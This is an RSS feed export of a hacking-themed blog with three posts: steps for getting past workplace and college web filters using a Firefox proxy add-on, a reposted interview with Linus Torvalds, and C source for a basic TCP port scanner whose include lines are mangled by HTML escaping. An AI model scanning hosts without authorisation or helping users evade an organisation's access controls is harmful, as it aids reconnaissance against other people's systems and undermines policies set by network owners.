<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-4201259273499093708</atom:id><lastBuildDate>Sun, 08 Sep 2024 18:14:37 +0000</lastBuildDate><title>Amit-Spot::The True Hacking Spot</title><description></description><link>http://amit-spot.blogspot.com/</link><managingEditor>noreply@blogger.com (Amit Tyagi)</managingEditor><generator>Blogger</generator><openSearch:totalResults>36</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-305566661707091632</guid><pubDate>Thu, 25 Oct 2012 11:04:00 +0000</pubDate><atom:updated>2012-10-25T05:02:09.761-07:00</atom:updated><title>Trick to get access into Facebook, YouTube and other Social Networking sites in Schools and Offices</title><description>&lt;u&gt;&lt;b&gt;Get access to Blocked websites in offices and Colleges with this Trick:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Well, This post is for all those guys who are really dying without facebook and social networking in the premises of their College or Offices. I also was suffering from the same situation my company has blocked all the social networking websites, torrent site , porn sites, and other music sites etc. These people were using FortiGuard to block all the traffic to above mentioned websites. Basically all the companies and organization uses Web Filtering application those want to block some unwanted sites.This way they they create a proxy point to let the data pass through this point and the this application applies filtering rules over this data for the valid access to the sites. But if some how you could bypass this point then it could be the way to get access to your desired site.Although you all know that proxy servers are the way to go to these sites in the same way but Web filtering application prevents you to go to any proxy site.&lt;br /&gt;

&lt;br /&gt;
&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;float: left; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw0bZr0vHTO7b9z4zVGuhe2Jljxz8n1G1hj4s6q_W2V1v_wm_JfLkaVGSe9kIcGjdGZ5b1uP1XKMqWxyckiTmS0Dr3ZU2-1bdFr_ZiTMpHF0gXneI_MfpwdoGRj-JcJ2JTkI8Rb9MbBK0/s1600/Proxy.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw0bZr0vHTO7b9z4zVGuhe2Jljxz8n1G1hj4s6q_W2V1v_wm_JfLkaVGSe9kIcGjdGZ5b1uP1XKMqWxyckiTmS0Dr3ZU2-1bdFr_ZiTMpHF0gXneI_MfpwdoGRj-JcJ2JTkI8Rb9MbBK0/s1600/Proxy.jpg&quot; style=&quot;cursor: move;&quot; width=&quot;430&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Role of Proxy server in Networking&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
So what should be the solution for this situation&amp;gt; i have tried a lot but didn&#39;t find a proxy site which could provide me the access to go there. Finally I have come across to a tiny application which was hosted on Google Apps. This tiny application is named as &quot;&lt;span style=&quot;color: red;&quot;&gt;Blue Box&lt;/span&gt;&quot;.If you go to this application then it will provide you the access to social networking sites.All you need to do is to follow these steps:&lt;br /&gt;
&lt;br /&gt;
1. Download Mozilla Firefox Browser from &lt;a href=&quot;http://www.mozilla.org/&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;.&lt;br /&gt;
2. Now press CTRL+SHIFT+A to open Add-Ons window.&lt;br /&gt;
3.Now search for Blue Box Add-on.&lt;br /&gt;
4.Click on Install button to install this Add-one.&lt;br /&gt;
5.Now restart the bowser to make changes.&lt;br /&gt;
6.Go to &lt;a href=&quot;http://www.google.co.in/&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; and search for Facebook here.&lt;br /&gt;
7. Right click on the first result for facebook.com&lt;br /&gt;
8. open with Blue Box.&lt;br /&gt;
&lt;br /&gt;
You are done with all the configurations and you will see the real facebook page and now proceed further to have fun.&lt;br /&gt;
&lt;br /&gt;
If you have further queries then please let me know in comments.&lt;br /&gt;
&lt;br /&gt;
Have fun guys !!</description><link>http://amit-spot.blogspot.com/2012/10/trick-to-get-access-into-facebook.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw0bZr0vHTO7b9z4zVGuhe2Jljxz8n1G1hj4s6q_W2V1v_wm_JfLkaVGSe9kIcGjdGZ5b1uP1XKMqWxyckiTmS0Dr3ZU2-1bdFr_ZiTMpHF0gXneI_MfpwdoGRj-JcJ2JTkI8Rb9MbBK0/s72-c/Proxy.jpg" height="72" width="72"/><thr:total>7</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-1399573503056085019</guid><pubDate>Wed, 16 Mar 2011 11:50:00 +0000</pubDate><atom:updated>2011-03-16T05:47:48.176-07:00</atom:updated><title>An Interview with Linus Torvalds</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div align=&quot;center&quot;&gt;&lt;/div&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjou0tM9i_iUjNcMghTPn_y4ZeRn9tiocuApVOFzdKw0-hlDKXsrlTrLi5HK6qUaagwgM_uybmdKbg0M6TfI7P3xBIN30LOqc0QMY0j-1Q0yeS4lSuWENlLMuOPp6CwnO-SZeo6QuUL_FE/s1600/Linus_Torvalds.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjou0tM9i_iUjNcMghTPn_y4ZeRn9tiocuApVOFzdKw0-hlDKXsrlTrLi5HK6qUaagwgM_uybmdKbg0M6TfI7P3xBIN30LOqc0QMY0j-1Q0yeS4lSuWENlLMuOPp6CwnO-SZeo6QuUL_FE/s320/Linus_Torvalds.jpg&quot; width=&quot;208&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;As everybody know that Linus Torvalds is the father of Linux.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;So what&#39;s going on with Linux and Linus these days? There are a lot of  people who are asking, with yet another delay of Microsoft&#39;s Vista. Linux could  emerge a victor in this voracious vindication for valor with the votive that  there is value in the virtues of running Linux. That being said, you may call him  Linus... and this was our interView: &lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 12pt;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Will&lt;/span&gt;&lt;/b&gt;: &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;Did you ever expect Linux to get as popular as it did? &lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Linus&lt;/span&gt;&lt;/b&gt;: &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Obviously not. Nobody did.  &lt;br /&gt;
In fact, I have this theory that _if_ you put your expectations high and  set lofty goals, you&#39;ll just fail. You&#39;ll worry about all the things you  need to get done, and you&#39;ll be discouraged by how much work there is left to do. &lt;br /&gt;
&lt;br /&gt;
So the way I worked (and still work) is to just worry about &quot;today&quot;. No  huge expectations, just doing whatever makes sense at the time, and enjoy  doing it. &lt;/span&gt;&lt;/span&gt;    &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Will&lt;/span&gt;&lt;/b&gt;: &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;Having used myself many different distros of Linux  including SuSE, Red Hat, Mandriva, etc... Do you have a personal favorite mainstream  distro? &lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Linus&lt;/span&gt;&lt;/b&gt;: &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;I used to actively make sure I used several different  ones, just to not be biased. So I had a RH box _and_ a SuSE one, and switched  between them, for example. At some point I decided it doesn&#39;t really matter any more:  the market is big enough that nobody cares what _I_ do, so just for  simplicity &lt;br /&gt;
I ended up doing just one distribution so that my different machines  looked as similar as possible. &lt;br /&gt;
&lt;br /&gt;
Of course, the &quot;one distribution&quot; has changed over time. It used to be  SuSE, then when I switched to PowerPC it was YellowDog, then when Fedora did a  PPC version I switched to that (so that I could have the same thing on my G5  desktop and my regular x86 laptop). &lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;So right now it happens to be FC5. Whether that is &quot;favourite&quot; or not,  I&#39;m not sure. It&#39;s more of a random choice. &lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Will&lt;/span&gt;&lt;/b&gt;: I&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt; remember the toils of getting iBrowse to work on my  Amiga, and many years has since past, What&#39;s your favorite Web-Browser? &lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;  &lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;Linus&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;: Konqueror was my browser of choice for several years,  because it had anti-aliasing early and none of the others did that well. These days  they all do more than I tend to need, so I&#39;ve ended up using konqueror mostly  as a file manager, and for actual web browsing I use Firefox just because  it&#39;s everywhere. &lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Will&lt;/span&gt;&lt;/b&gt;: &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Wife wants to know... what&#39;s your favorite geek gadget? &lt;br /&gt;
&lt;br /&gt;
Umm. I&#39;m actually so spoiled that when I go to most electronics stores,  I&#39;m not drooling after any gadgets there, since I have better gadgets at home -  often stuff that hasn&#39;t been released yet ; &lt;br /&gt;
&lt;br /&gt;
Which kind of makes me jaded. &lt;br /&gt;
&lt;br /&gt;
I don&#39;t know if it counts as a &quot;gadget&quot;, but I drool after the Canon 5D  (it&#39;s a full-frame DSLR camera, in case you&#39;re not into that kind of fetish). I  just can&#39;t see myself blowing that much money on something that in the end -  for me - is just a total toy. &lt;/span&gt;&lt;/span&gt;    &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Will&lt;/span&gt;&lt;/b&gt;: &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Virtualization is all the buzz in computing today. With  companies opening up to alternative OS&#39;s running on their hardware, do you think  Linux will have a significant role in emerging technologies such as  replacement of closed source software? &lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Linus&lt;/span&gt;&lt;/b&gt;: I&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt; think you already see it. I think that very much for  emerging technologies, the flexibility of open source ends up being a big deal.  Think TiVo in the DVR space, and now apparently the PS3 in gaming. Places  where people do some custom thing of their own, but need a real OS for the &lt;br /&gt;
flexibility. &lt;br /&gt;
&lt;br /&gt;
Now, whether virtualization will be such a huge market, we&#39;ll see. &lt;/span&gt;&lt;/span&gt;  &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Will&lt;/span&gt;&lt;/b&gt;: &lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;And with that our Linux hero disappears off into the  Internet sifting through hundreds of e-mails a day, cranking out the next latest  and greatest kernel called... Linux. &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;So this was a tiny interview of Linus Torvalds with William nett.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 12pt;&quot;&gt;&lt;iframe align=&quot;left&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot; src=&quot;http://rcm.amazon.com/e/cm?t=amispothe-20&amp;amp;o=1&amp;amp;p=8&amp;amp;l=bpl&amp;amp;asins=0131367366&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr&quot; style=&quot;align: left; height: 245px; padding-right: 10px; padding-top: 5px; width: 131px;&quot;&gt;&lt;/iframe&gt;&amp;nbsp;&amp;nbsp;&lt;iframe align=&quot;left&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot; src=&quot;http://rcm.amazon.com/e/cm?t=amispothe-20&amp;amp;o=1&amp;amp;p=8&amp;amp;l=bpl&amp;amp;asins=1430219998&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr&quot; style=&quot;align: left; height: 245px; padding-right: 10px; padding-top: 5px; width: 131px;&quot;&gt;&lt;/iframe&gt;&lt;iframe align=&quot;left&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot; src=&quot;http://rcm.amazon.com/e/cm?t=amispothe-20&amp;amp;o=1&amp;amp;p=8&amp;amp;l=bpl&amp;amp;asins=B0018KAN9E&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr&quot; style=&quot;align: left; height: 245px; padding-right: 10px; padding-top: 5px; width: 131px;&quot;&gt;&lt;/iframe&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/03/interview-with-linus-torvalds.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjou0tM9i_iUjNcMghTPn_y4ZeRn9tiocuApVOFzdKw0-hlDKXsrlTrLi5HK6qUaagwgM_uybmdKbg0M6TfI7P3xBIN30LOqc0QMY0j-1Q0yeS4lSuWENlLMuOPp6CwnO-SZeo6QuUL_FE/s72-c/Linus_Torvalds.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-1068216107347815858</guid><pubDate>Wed, 09 Mar 2011 21:05:00 +0000</pubDate><atom:updated>2011-03-09T13:05:00.444-08:00</atom:updated><title>creating a Port scanner in C -</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt; &lt;b&gt;&lt;i&gt;#include &lt;/i&gt;&lt;stdio.h&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;  //standard library function&lt;br /&gt;
#include &lt;/i&gt;&lt;sys types.h=&quot;&quot;&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//for  socket n networking functions&lt;br /&gt;
#include &lt;/i&gt;&lt;sys socket.h=&quot;&quot;&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; //for  socket function&lt;br /&gt;
#include &lt;/i&gt;&lt;netinet in.h=&quot;&quot;&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//for  networking&lt;br /&gt;
#include &lt;/i&gt;&lt;netdb.h&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//for  database......... not required........ here&lt;br /&gt;
#include &lt;/i&gt;&lt;stdlib.h&gt;&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//stad  library function hope u guys know abt this&lt;br /&gt;
#include &lt;/i&gt;&lt;errno.h&gt;&lt;i&gt;&lt;br /&gt;
&lt;br /&gt;
/* Main programs starts*/&lt;br /&gt;
int main(int argc, char **argv)&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//argc&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp; &amp;nbsp;int&amp;nbsp; &amp;nbsp;sd;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//socket descriptor&lt;br /&gt;
&amp;nbsp; &amp;nbsp;int&amp;nbsp; &amp;nbsp; port;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//port number&lt;br /&gt;
&amp;nbsp; &amp;nbsp;int&amp;nbsp; &amp;nbsp;start;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//start port&lt;br /&gt;
&amp;nbsp; &amp;nbsp;int&amp;nbsp; &amp;nbsp; end;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//end port&lt;br /&gt;
&amp;nbsp; &amp;nbsp;int&amp;nbsp; &amp;nbsp; rval;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//socket descriptor for connect&lt;br /&gt;
&amp;nbsp; &amp;nbsp;char&amp;nbsp; &amp;nbsp; response[1024];&amp;nbsp; &amp;nbsp; &amp;nbsp; //to receive data&lt;br /&gt;
&amp;nbsp; &amp;nbsp;char&amp;nbsp; &amp;nbsp;*message=&quot;shell&quot;;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//data to send&lt;br /&gt;
&amp;nbsp; &amp;nbsp;struct hostent *hostaddr;&amp;nbsp; &amp;nbsp;//To be used for IPaddress&lt;br /&gt;
&amp;nbsp; &amp;nbsp;struct sockaddr_in servaddr;&amp;nbsp; &amp;nbsp;//socket structure&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;if (argc &amp;lt; 4 )&lt;br /&gt;
&amp;nbsp; &amp;nbsp;{&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; printf(&quot;------Created By &lt;/i&gt;  &lt;a href=&quot;http://www.softhardware.co.uk-----------%5C/&quot; target=&quot;_blank&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: black;&quot;&gt;&lt;i&gt;s&lt;/i&gt;&lt;/span&gt;&lt;/a&gt;&lt;i&gt;ofthardware&amp;nbsp;n&quot;);&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; printf(&quot;--------------------------------------------------\n&quot;);&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; printf(&quot;Usage: ./tscan &lt;/i&gt;&lt;ipaddress&gt;&lt;i&gt; &lt;/i&gt;&lt;start port=&quot;&quot;&gt;&lt;i&gt; &lt;/i&gt;&lt;end port=&quot;&quot;&gt;&lt;i&gt;\n&quot;);&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; printf(&quot;--------------------------------------------------\n&quot;);&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; return (EINVAL);&lt;br /&gt;
&amp;nbsp; &amp;nbsp;}&lt;br /&gt;
&amp;nbsp;  &amp;nbsp;start = atoi(argv[2]);&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;  &amp;nbsp;  &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//Takes the starting port number to scan from&lt;br /&gt;
&amp;nbsp; &amp;nbsp;end&amp;nbsp; &amp;nbsp;=  atoi(argv[3]);&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;  &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;  // FOr last port number that has to be scanned&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;for (port=start; port&amp;lt;=end; port++)&lt;br /&gt;
&amp;nbsp; &amp;nbsp;{&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//portno is ascii to int second argument&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;  &amp;nbsp;sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); //created the tcp   socket // PF_INET==family name AF_INET can also be used, SOCK_STREAM is   how data bytes have to be sent, IPPRPTP_TCP== which protocol to follow,   UDP or TCP&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;if (sd == -1) // THis fucntion checks for the  socket creation, if  socket is created successful then continue else....&amp;nbsp;  &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;  &amp;nbsp; &amp;nbsp;print error&lt;br /&gt;
&amp;nbsp; &amp;nbsp;{&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;perror(&quot;Socket()\n&quot;);&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;return (errno);&lt;br /&gt;
&amp;nbsp; &amp;nbsp;}&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;memset( &amp;amp;servaddr, 0, sizeof(servaddr));&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;servaddr.sin_family = AF_INET;&amp;nbsp; //FAMILY NAME&lt;br /&gt;
&amp;nbsp; &amp;nbsp;servaddr.sin_port = htons(port); //set the portno&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;hostaddr = gethostbyname( argv[1] ); //get the ip 1st argument&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;memcpy(&amp;amp;servaddr.sin_addr, hostaddr-&amp;gt;h_addr,  hostaddr-&amp;gt;h_length);&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;//below connects to the specified ip in hostaddr&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;rval = connect(sd, (struct sockaddr *) &amp;amp;servaddr,  sizeof(servaddr));&lt;br /&gt;
&amp;nbsp; &amp;nbsp;if (rval == -1)&lt;br /&gt;
&amp;nbsp; &amp;nbsp;{&lt;br /&gt;
&amp;nbsp; &amp;nbsp;printf(&quot;Port %d is closed\n&quot;, port);&lt;br /&gt;
&amp;nbsp; &amp;nbsp;close(sd);&lt;br /&gt;
&amp;nbsp; &amp;nbsp;}&lt;br /&gt;
&amp;nbsp; &amp;nbsp;else&lt;br /&gt;
&amp;nbsp; &amp;nbsp;printf(&quot;Port %d is open\n&quot;,port);&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;close(sd);&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;//socket descriptor&lt;br /&gt;
&amp;nbsp; &amp;nbsp;}&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
